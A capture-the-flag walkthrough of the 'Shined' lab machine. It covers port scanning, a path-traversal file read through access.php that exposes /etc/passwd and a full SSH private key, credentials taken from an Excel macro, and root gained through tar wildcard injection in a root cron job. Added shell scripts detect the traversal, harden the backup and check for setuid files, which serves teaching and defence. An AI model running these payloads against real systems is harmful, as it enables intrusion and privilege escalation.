TheHackersLabs-Shined: Detailed Machine Walkthrough (WP)
城南花已开

Information Gathering

Service Discovery

sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e3:f6:57 VMware, Inc.
192.168.60.151 08:00:27:38:47:87 PCS Systemtechnik GmbH
192.168.60.254 00:50:56:f0:df:73 VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.082 seconds (122.96 hosts/sec). 4 responded
export ip=192.168.60.151
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
RustScan: Where '404 Not Found' meets '200 OK'.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.151:22
Open 192.168.60.151:80
Open 192.168.60.151:2222
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-14 22:34 CST
Initiating ARP Ping Scan at 22:34
Scanning 192.168.60.151 [1 port]
Completed ARP Ping Scan at 22:35, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 22:35
Completed Parallel DNS resolution of 1 host. at 22:35, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 22:35
Scanning 192.168.60.151 [3 ports]
Discovered open port 22/tcp on 192.168.60.151
Discovered open port 80/tcp on 192.168.60.151
Discovered open port 2222/tcp on 192.168.60.151
Completed SYN Stealth Scan at 22:35, 0.06s elapsed (3 total ports)
Nmap scan report for 192.168.60.151
Host is up, received arp-response (0.00093s latency).
Scanned at 2025-01-14 22:35:00 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 63
2222/tcp open EtherNetIP-1 syn-ack ttl 63
MAC Address: 08:00:27:38:47:87 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.34 seconds
Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

Visiting port 80 shows a sunglasses shop; nearly every link on it is just an anchor link.

A directory scan turned up nothing useful.

❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.151
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 317] [--> http://192.168.60.151/images/]
/privacy (Status: 301) [Size: 318] [--> http://192.168.60.151/privacy/]
/css (Status: 301) [Size: 314] [--> http://192.168.60.151/css/]
/js (Status: 301) [Size: 313] [--> http://192.168.60.151/js/]
/server-status (Status: 403) [Size: 279]
Progress: 207643 / 207644 (100.00%)
===============================================================
Finished
===============================================================

Switched to a different wordlist and added file extensions.

❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt -x php,html,zip,txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.151
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,html,zip,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 279]
/.hta.php (Status: 403) [Size: 279]
/.hta.html (Status: 403) [Size: 279]
/.hta.txt (Status: 403) [Size: 279]
/.hta.zip (Status: 403) [Size: 279]
/.htaccess (Status: 403) [Size: 279]
/.htaccess.php (Status: 403) [Size: 279]
/.htaccess.zip (Status: 403) [Size: 279]
/.htaccess.html (Status: 403) [Size: 279]
/.htaccess.txt (Status: 403) [Size: 279]
/.htpasswd.php (Status: 403) [Size: 279]
/.htpasswd.html (Status: 403) [Size: 279]
/.htpasswd.zip (Status: 403) [Size: 279]
/.htpasswd (Status: 403) [Size: 279]
/.htpasswd.txt (Status: 403) [Size: 279]
/about.html (Status: 200) [Size: 7269]
/access.php (Status: 200) [Size: 1849]
/contact.html (Status: 200) [Size: 8716]
/css (Status: 301) [Size: 314] [--> http://192.168.60.151/css/]
/images (Status: 301) [Size: 317] [--> http://192.168.60.151/images/]
/index.html (Status: 200) [Size: 21819]
/index.html (Status: 200) [Size: 21819]
/js (Status: 301) [Size: 313] [--> http://192.168.60.151/js/]
/privacy (Status: 301) [Size: 318] [--> http://192.168.60.151/privacy/]
/server-status (Status: 403) [Size: 279]
/shop.html (Status: 200) [Size: 7374]
Progress: 23670 / 23675 (99.98%)
===============================================================
Finished
===============================================================

LFI File Read

There is a login page at /access.php.

image

Tried SQL injection: there is no injection point, and a failed login gives no feedback at all ❓ Normally it would say the username or password is wrong.

Guessing there is an LFI (local file inclusion) bug.

Fuzzed the parameter name and, sure enough, there is an LFI vulnerability.

❯ wfuzz -c -u "http://192.168.60.151/access.php?FUZZ=../../../../../etc/passwd" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt --hw 129
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://192.168.60.151/access.php?FUZZ=../../../../../etc/passwd
Total requests: 207643

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000003720: 200 88 L 164 W 3164 Ch "inet"

Reading the file reveals a user named cifra.

❯ curl http://192.168.60.151/access.php\?inet\=../../../../../etc/passwd
<div>
…… omitted ……
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
cifra:x:1000:1000:,,,:/home/cifra:/bin/bash
</div>
</body>
</html>

Reading other files yields a private key.

❯ curl http://192.168.60.151/access.php\?inet\=../../../../../home/cifra/.ssh/id_rsa
…… omitted ……
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAACFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAgEAuFRQ4zP1VRSL6EHONGERwViF9ZYKqNKO3W0vlzqqbPKW9khwvL81
banzYtUQF9e6aw97VYnXaDVU4QvjoECvQ4G7RmRl+UDZZOuJJGnkFOq24Mf+VjGTz6VWyn
adW0vl730cqPOGrZPjMpxyu1bPtdxEE2LKOgqo0D2BJ8qkZG7G9a3NWclpWdZNrhSnrFsW
/2vkh/E1qvfD9vnQgzWpClC9J8ZjpBf1fUHI6pWkOp2OzaEHqSczDKDsqey4w/y+QPrYHA
CCW766eOqdnMwGCkId538WWkP6w8uoPZ3pEjNxVZErWLFxtT1nalK203/OamSRbUXdpdzH
pzx7j8makk5rSlVD5Bgu4UhDRsyOuwro5Ku80uYACEDYd/6Gcg6Sy9qpePZBNREJmKR6cK
6i/hBBTEIxUh2oamX96+b+bHi/1gSdERTToQDXvh4Y1ZlbsbC42CjcWk19AqKodohZrhDy
j3M/CNPEDNM5O22LIwWQmVuW4Nb3QpyTJe0An0pqpesNto0QiBrirMqLoMO4lJEM6EOuY8
ol23muLr3B0kZLO3IDiUj7J6f2GRP8O5ALblDbZA3iYG+D5M7bz205xtSSO94OwN9Ub95Z
mnNSB22QTs8c1eeln1c/vG5TiAe2WGicTMA05fL4mu/E/MmovZIToc3Wjtw5Dz/z6idU/L
MAAAdIUs4FU1LOBVMAAAAHc3NoLXJzYQAAAgEAuFRQ4zP1VRSL6EHONGERwViF9ZYKqNKO
3W0vlzqqbPKW9khwvL81banzYtUQF9e6aw97VYnXaDVU4QvjoECvQ4G7RmRl+UDZZOuJJG
nkFOq24Mf+VjGTz6VWynadW0vl730cqPOGrZPjMpxyu1bPtdxEE2LKOgqo0D2BJ8qkZG7G
9a3NWclpWdZNrhSnrFsW/2vkh/E1qvfD9vnQgzWpClC9J8ZjpBf1fUHI6pWkOp2OzaEHqS
czDKDsqey4w/y+QPrYHACCW766eOqdnMwGCkId538WWkP6w8uoPZ3pEjNxVZErWLFxtT1n
alK203/OamSRbUXdpdzHpzx7j8makk5rSlVD5Bgu4UhDRsyOuwro5Ku80uYACEDYd/6Gcg
6Sy9qpePZBNREJmKR6cK6i/hBBTEIxUh2oamX96+b+bHi/1gSdERTToQDXvh4Y1ZlbsbC4
2CjcWk19AqKodohZrhDyj3M/CNPEDNM5O22LIwWQmVuW4Nb3QpyTJe0An0pqpesNto0QiB
rirMqLoMO4lJEM6EOuY8ol23muLr3B0kZLO3IDiUj7J6f2GRP8O5ALblDbZA3iYG+D5M7b
z205xtSSO94OwN9Ub95ZmnNSB22QTs8c1eeln1c/vG5TiAe2WGicTMA05fL4mu/E/MmovZ
IToc3Wjtw5Dz/z6idU/LMAAAADAQABAAACAAUQkOif63cLDRf0kEIsEbtSjdtH5C2kxoxB
+1/w/jeudguHGs0CMRQEI3wiUcmaXju+gRml3HBFoDMH54r0hO4TatqcO+6cgArjco2cFT
wX5VlCVYJpHcPDqhNULVk8cs3Ef8df+EWIIXEMujIVAWN9G7X2pqd+K5jxLehA7xcUeM0i
xB+E1Q62slK1yLCH1xc0j+LiyRPid3iTDWqVhXo+Bq5Itc+dtnfo4DbiUHubJ+OcL87dv8
9HockT69+CtyLgfgX4Ryrk84lDje2ompGpCGj7kDx/64/sAsivE+cVSm9pD43lmOy7ilqc
zt8X1Etj+B+j5hQh/5InnTqjddh7ZshDVHlPlSuXcJ9XME5dBpyE5rm2fPuJ6bJ8LBNnrV
T5JB7fMuppEs90LEAN54hoD4vkwDViGGvp5IMImCFEkfse3J1ywgOvsG7e+evBLNk79Wzn
4XzrLWlvs0IydHsfrnFrTtqLLLQtBlHkdoQdxRF2a63FgCmTUKVGbAQ+bQrv5wBHIYc6Ra
75V66VdrS4rRlbMVBKBoNLky1/4UNctBuV4niywqM2GIfzdBibRAgLDiNofwMrybLZ1dQb
IM8krY/xOrV23OINgdUz8xymagW2BBqo+hBckypQojsSlal1uYmIWdGgcxgAbl+YtsFG75
3OcPmKSzSZnlPBr+yVAAABAG3WkyUWKHSUSV3QA8eUai0IFPrCejR/EtLuTXxhS1rJkw2r
HnXP1vybBsciinOZ79MKeoqcQLUDF1D7TmwPaC9WKHPUg0KHxtXJywphj4QjPSufZZYXgO
SlgmXWr/Tsd2GjlNHWZ8DjdPXwnLgw48G6DVMqJFKYWyqKUQaMjISznvpXkU+eF2SYXo4S
UtaVjoG/6POPJ5vPuV3MlYnGfaBPqyTrb82/9usTVb3Vzh5mKXocCDi1F7H+eoikItUQKJ
i3SoakpUNl7curVmnMbYHf7KHCwIJnpf2SRi0RVVm/8iCOxuQafAaOg2+JFw4I7rZ8Eh+8
Ff2RkeR3U6MzQVUAAAEBAO85aGKbNZtCtdRly9/SVPA7YkHDfZqGxQQiu8vxaeORjujJF9
0+a4QaEvsR8qidVHIXFhK7ha2DNwAgcZjc/u4S4fahyF5yR55V6zJ7uAq2VgYgat2S20NG
7FVi2asEq9ASt6P6IoJcSQdkXNxk1oUIPa6ORJaC3HAO6g/2Jb60eJWGckGNRr49kC51/D
8mU6x33EF/uD5BRvNXVQkISbnqEBbF2mZhurIuydlVi7oiXgQ98j83rVRWsatMVTwQCh82
CzPzLH4kh3jAc4JUgQcleJS2BcPEYU2pfj8Af1eQj1MkGCVHqiXHinpo+Er5c7w1yOI6By
T5xJIjuuVYsg8AAAEBAMVBbSKlPeCRNOYYlsK8ouNO2kUufJrOP/lsoR4uQltIm3kDzN5n
5gpXYLeMXVXLxd8oKCHIMB2nck0DO6ybkUCCTOQGcH1GUGpNJKWKQvTpRUdxsL1RlK5HN7
fqXX3h4BpQfp7e2J5kX8YzZ71oVs7S2emLV+p4TkUIRM9sNKCj55YQelqwU3QBGNzBY37+
WgiNRUaCDXU839wduJTHeoKlQcm6DthlCK0/bKzfyAX3YOD6YuR2APA6x86pjqNts24XIM
uZBU/ROto8wyQHvyjmA1gl9/VmRMtUnB8WWvkBaJfwKAQKGq2prr1ycbJoFKuKSnRp0bzg
Dl7j6nq3Hx0AAAASY2lmcmFAYjEzZDM1OWJjMzBiAQ==
-----END OPENSSH PRIVATE KEY-----
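Both reads above (/etc/passwd and then the SSH private key through the inet parameter) leave an obvious trace in the web server's access log. As an added example that is not part of the original writeup, the POSIX shell functions below flag such requests in Apache-style log lines. The log lines, client address, timestamps and user agents are constructed for the example (only the URL shapes follow the page), and make_sample_log, traversal_requests and count_sensitive_reads are names chosen here.

```shell
#!/bin/sh
# Added example, not code from the original writeup.
# Flags path-traversal requests, like the access.php?inet=../../../../../etc/passwd
# reads above, in Apache-style access logs. All log lines below are constructed.

# make_sample_log FILE: write a constructed access log to FILE.
make_sample_log() {
  cat >"$1" <<'EOF'
192.168.60.100 - - [14/Jan/2025:22:40:01 +0800] "GET /index.html HTTP/1.1" 200 21819 "-" "Mozilla/5.0"
192.168.60.100 - - [14/Jan/2025:22:41:12 +0800] "GET /access.php?inet=../../../../../etc/passwd HTTP/1.1" 200 3164 "-" "curl/8.5.0"
192.168.60.100 - - [14/Jan/2025:22:41:30 +0800] "GET /access.php?inet=..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 200 3164 "-" "Wfuzz/3.1.0"
192.168.60.100 - - [14/Jan/2025:22:42:05 +0800] "GET /shop.html HTTP/1.1" 200 7374 "-" "Mozilla/5.0"
192.168.60.100 - - [14/Jan/2025:22:43:17 +0800] "GET /access.php?inet=../../../../../home/cifra/.ssh/id_rsa HTTP/1.1" 200 5210 "-" "curl/8.5.0"
EOF
}

# traversal_requests LOG: print requests whose URL contains a parent-directory
# step, raw ("../") or percent-encoded ("..%2f", "%2e%2e/", "%2e%2e%2f").
traversal_requests() {
  grep -Ei '"(GET|POST|HEAD) [^"]*(\.\./|\.\.%2f|%2e%2e/|%2e%2e%2f)' "$1"
}

# count_sensitive_reads LOG: number of traversal requests that name a file the
# web root should never serve (/etc/passwd or an SSH private key).
# Prints the count; exits non-zero when the count is 0 (grep -c semantics).
count_sensitive_reads() {
  traversal_requests "$1" | grep -Eic '(/etc/passwd|etc%2fpasswd|\.ssh/id_rsa|\.ssh%2fid_rsa)'
}

# Stand-alone run: build the sample log and report on it.
log=$(mktemp)
make_sample_log "$log"
echo "traversal requests:"
traversal_requests "$log"
echo "sensitive reads: $(count_sensitive_reads "$log")"
rm -f "$log"
```

On the sample log this reports three traversal requests, all three of which read sensitive files. The application-side fix is the usual one for this bug class: map the inet value through a fixed allowlist of include targets instead of building a path from it, so no traversal reaches the filesystem in the first place.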

Tried cracking the private key's passphrase, ha, turns out the key has no passphrase at all.

❯ vim id_rsa
❯ ssh2john id_rsa >hash
id_rsa has no password!

But when I tried to SSH in, it still asked for the user's password.

Then I remembered the scan had also found port 2222.

Try connecting with that port specified.

❯ ssh cifra@$ip -i id_rsa -p2222
The authenticity of host '[192.168.60.151]:2222 ([192.168.60.151]:2222)' can't be established.
ED25519 key fingerprint is SHA256:rpq/IGJ60HZMEXbZDq1zSx9/6CKFJTOTyb3ubKwwu3Y.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.60.151]:2222' (ED25519) to the list of known hosts.
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-101-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro

This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.
Last login: Tue Apr 9 13:53:46 2024 from 192.168.1.210
cifra@b13d359bc30b:~$ ls
contabilidad.xlsm

Macro File

There is an Excel file; let's download it and take a look.

The target has Python, so I started an HTTP server on it, only to find that this user seems to be inside a Docker container.

Docker has no port mapping for 8000, so the file can't be downloaded that way.

I was about to tunnel through with Ligolo-ng.

Then it hit me: plain scp does the job. Silly me 🤣

❯ scp -P 2222 -i id_rsa cifra@192.168.60.151:contabilidad.xlsm .
contabilidad.xlsm 100% 13KB 8.2MB/s 00:00

Opening it shows it contains a macro.

image

Modulo1 contains the user credentials leopoldo: snickers.

image

User Privilege Escalation

Try logging in over SSH.

❯ ssh leopoldo@$ip
leopoldo@192.168.60.151's password:
Welcome to Ubuntu 22.04.4 LTS (GNU/Linux 5.15.0-101-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro

System information as of Tue Jan 14 03:14:36 PM UTC 2025

System load: 0.0 Processes: 128
Usage of /: 53.4% of 11.21GB Users logged in: 0
Memory usage: 19% IPv4 address for docker0: 172.17.0.1
Swap usage: 0% IPv4 address for enp0s3: 192.168.60.151

* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
just raised the bar for easy, resilient and secure K8s cluster deployment.

https://ubuntu.com/engage/secure-kubernetes-at-the-edge

Expanded Security Maintenance for Applications is not enabled.

18 updates can be applied immediately.
To see these additional updates run: apt list --upgradable

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Tue Apr 9 14:45:36 2024 from 192.168.1.41
leopoldo@shined:~$ cat user.txt
73f5b965bd7e817a71b853f44ada19b0

Information Gathering Again

In /tmp I found a backup script and a cleanup script, and suspected they run on a schedule in the background.

Upload pspy64.

It shows the backup script runs every minute.

leopoldo@shined:/tmp$ cat backup.sh
#!/bin/bash

cd /home/leopoldo/Desktop/scripts/
tar -zcf /home/leopoldo/Desktop/scripts/backup.tgz *
leopoldo@shined:/tmp$ wget 192.168.60.100/pspy64
--2025-01-14 15:17:41-- http://192.168.60.100/pspy64
Connecting to 192.168.60.100:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3104768 (3.0M) [application/octet-stream]
Saving to: ‘pspy64’

pspy64 100%[================================================================>] 2.96M --.-KB/s in 0.03s

2025-01-14 15:17:41 (115 MB/s) - ‘pspy64’ saved [3104768/3104768]

leopoldo@shined:/tmp$ chmod +x pspy64
leopoldo@shined:/tmp$ ./pspy64
2025/01/14 15:18:01 CMD: UID=0 PID=3146 | /usr/sbin/CRON -f -P
2025/01/14 15:18:01 CMD: UID=0 PID=3145 | /usr/sbin/CRON -f -P
2025/01/14 15:18:01 CMD: UID=0 PID=3148 | /bin/bash /tmp/backup.sh
2025/01/14 15:18:01 CMD: UID=0 PID=3147 | /bin/bash /tmp/backup.sh
2025/01/14 15:18:01 CMD: UID=0 PID=3149 | tar -zcf /home/leopoldo/Desktop/scripts/backup.tgz backup.tgz
2025/01/14 15:18:01 CMD: UID=0 PID=3150 | /bin/sh -c gzip

This command uses tar to pack the named file (backup.tgz) together with the directory contents, compresses them with gzip, and finally writes a compressed file named backup.tgz to the given path.

Put simply, it packs the files under /home/leopoldo/Desktop/scripts/ into an archive and drops it back into that same directory, and that directory is owned by the regular user.
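The unquoted * in backup.sh is expanded by the shell, running as root, inside a directory the regular user controls, so entry names become tar arguments. As an added example that is not part of the original writeup, the POSIX shell below shows a backup routine that keeps directory entries out of tar's option parser, together with a check for option-like entry names in an archived directory. The sample directory and its entries are constructed for the demo, and safe_backup and option_like_names are names chosen here.

```shell
#!/bin/sh
# Added example, not code from the original writeup.
# A backup routine that keeps directory entries out of tar's option parser, and a
# check for option-like entry names. Paths created in demo() are constructed.

# safe_backup SRC_DIR ARCHIVE: archive the contents of SRC_DIR into ARCHIVE.
# '-C SRC_DIR' plus the single operand '.' after '--' makes tar enumerate the
# directory itself, so an entry named '--checkpoint=1' is stored as a member
# instead of being parsed as an option. ARCHIVE must not live inside SRC_DIR,
# otherwise each run re-archives the previous archive (as backup.tgz did above).
safe_backup() {
  src=$1
  out=$2
  [ -d "$src" ] || { echo "safe_backup: $src is not a directory" >&2; return 1; }
  case $out in
    "$src"/*) echo "safe_backup: $out is inside $src" >&2; return 1 ;;
  esac
  tar -zcf "$out" -C "$src" -- .
}

# option_like_names DIR: print entries directly under DIR whose names start
# with '-'. In a directory that a privileged tar job archives with an unquoted
# '*', such names are the tell-tale of the trick used above.
option_like_names() {
  find "$1" -mindepth 1 -maxdepth 1 -name '-*' -exec basename {} \;
}

# demo: constructed directory with one ordinary file and one option-like name.
demo() {
  work=$(mktemp -d)
  mkdir "$work/scripts"
  echo 'echo hello' >"$work/scripts/run.sh"
  : >"$work/scripts/--checkpoint=1"
  safe_backup "$work/scripts" "$work/backup.tgz"
  echo "option-like entries:"
  option_like_names "$work/scripts"
  echo "archive members:"
  tar -tzf "$work/backup.tgz"
  rm -rf "$work"
}
demo
```

The demo lists --checkpoint=1 as an option-like entry and shows it stored as the member ./--checkpoint=1, with no checkpoint action ever reaching tar. The other half of the fix is outside the script: a root cron job should not execute a script from /tmp or archive a directory writable by the user it is backing up.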

Root Privilege Escalation

So we can escalate through tar directly, but not by running it ourselves.

image

We just turn the commands into file names: write a script that makes /tmp/sh a SUID binary.

leopoldo@shined:~/Desktop/scripts$ echo -e '#!/bin/bash\ncp /bin/bash /tmp/sh\nchmod +s /tmp/sh'>exp.sh
leopoldo@shined:~/Desktop/scripts$ chmod +x exp.sh
leopoldo@shined:~/Desktop/scripts$ echo "test"> '--checkpoint=1'
leopoldo@shined:~/Desktop/scripts$ echo "test"> '--checkpoint-action=exec=sh exp.sh'

Watch the processes.

2025/01/14 15:40:01 CMD: UID=0 PID=3594 | /usr/sbin/CRON -f -P
2025/01/14 15:40:01 CMD: UID=0 PID=3593 | /usr/sbin/CRON -f -P
2025/01/14 15:40:01 CMD: UID=0 PID=3595 | /bin/sh -c /bin/bash /tmp/backup.sh
2025/01/14 15:40:01 CMD: UID=0 PID=3596 | /bin/bash /tmp/backup.sh
2025/01/14 15:40:01 CMD: UID=0 PID=3597 | tar -zcf /home/leopoldo/Desktop/scripts/backup.tgz backup.tgz --checkpoint=1 --checkpoint-action=exec=sh exp.sh exp.sh
2025/01/14 15:40:01 CMD: UID=0 PID=3599 | /bin/sh -c sh exp.sh
2025/01/14 15:40:01 CMD: UID=0 PID=3598 | /bin/sh -c sh exp.sh
2025/01/14 15:40:01 CMD: UID=0 PID=3600 | /bin/sh -c gzip
2025/01/14 15:40:01 CMD: UID=0 PID=3601 | sh exp.sh
2025/01/14 15:40:01 CMD: UID=0 PID=3602 | chmod +s /tmp/sh
2025/01/14 15:40:01 CMD: UID=0 PID=3603 | tar -zcf /home/leopoldo/Desktop/scripts/backup.tgz backup.tgz --checkpoint=1 --checkpoint-action=exec=sh exp.sh exp.sh
2025/01/14 15:40:01 CMD: UID=0 PID=3604 | sh exp.sh
2025/01/14 15:40:01 CMD: UID=0 PID=3605 | cp /bin/bash /tmp/sh
2025/01/14 15:40:01 CMD: UID=0 PID=3606 | sh exp.sh

Now there is a SUID bash in /tmp; exploit it as usual.

leopoldo@shined:/tmp$ ./sh -p
sh-5.1# whoami
root
sh-5.1# cat /root/root.txt
01d940a42e6a3f5727e2382d9f4f3b87
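The two artefacts this chain leaves behind, a root cron job that works out of paths an unprivileged user can write to and a setuid copy of bash in /tmp, are both easy to check for. As an added example that is not part of the original writeup, the POSIX shell below implements both checks against a constructed directory tree and crontab; setuid_files and writable_cron_targets are names chosen here, and a real run would be pointed at /tmp and at /etc/cron.d or root's crontab.

```shell
#!/bin/sh
# Added example, not code from the original writeup.
# Two host checks for what this box was compromised through: a setuid copy of
# bash left in /tmp, and a root cron job whose script lives somewhere ordinary
# users can write. Everything demo() creates is constructed for the example.

# setuid_files DIR: print regular files under DIR with the setuid or setgid bit.
setuid_files() {
  find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null
}

# writable_cron_targets CRONTAB_FILE: for every command line in a crontab, print
# each absolute path it mentions that is writable by group or others, or whose
# parent directory is world-writable (a script in /tmp is reported for that reason).
# Comments, blank lines and VAR=value lines are skipped. -H follows only the
# command-line path, so a symlinked /bin is judged by its target, not the link.
writable_cron_targets() {
  grep -Ev '^[[:space:]]*(#|$)' "$1" | grep -Ev '^[[:space:]]*[A-Za-z_]+=' |
  grep -Eo '/[^[:space:]]+' | sort -u | while read -r p; do
    [ -e "$p" ] || continue
    dir=$(dirname "$p")
    if [ -n "$(find -H "$p" -maxdepth 0 \( -perm -0002 -o -perm -0020 \))" ] ||
       [ -n "$(find -H "$dir" -maxdepth 0 -perm -0002)" ]; then
      echo "$p"
    fi
  done
}

# demo: constructed tree with a setuid file and a cron job pointing at a script
# in a world-writable directory, next to a properly placed one.
demo() {
  w=$(mktemp -d)
  mkdir -p "$w/tmp" "$w/scripts" "$w/bin"
  chmod 755 "$w/tmp" "$w/bin"
  chmod 777 "$w/scripts"                         # user-writable, like the box
  printf '#!/bin/bash\ntar -zcf backup.tgz *\n' >"$w/scripts/backup.sh"
  printf '#!/bin/sh\nexit 0\n' >"$w/bin/safe.sh"
  chmod 755 "$w/scripts/backup.sh" "$w/bin/safe.sh"
  : >"$w/tmp/sh"
  chmod 4755 "$w/tmp/sh"                         # stands in for the setuid bash copy
  printf '# constructed crontab\nSHELL=/bin/sh\n* * * * * root /bin/bash %s/scripts/backup.sh\n0 3 * * * root %s/bin/safe.sh\n' "$w" "$w" >"$w/crontab"
  echo "setuid files:"
  setuid_files "$w/tmp"
  echo "writable cron targets:"
  writable_cron_targets "$w/crontab"
  rm -rf "$w"
}
demo
```

On the constructed tree the first check reports the setuid file and the second reports only the script in the world-writable directory; the properly placed script is left alone. A periodic run of both checks would have caught this chain at the cron step as well as at the setuid copy.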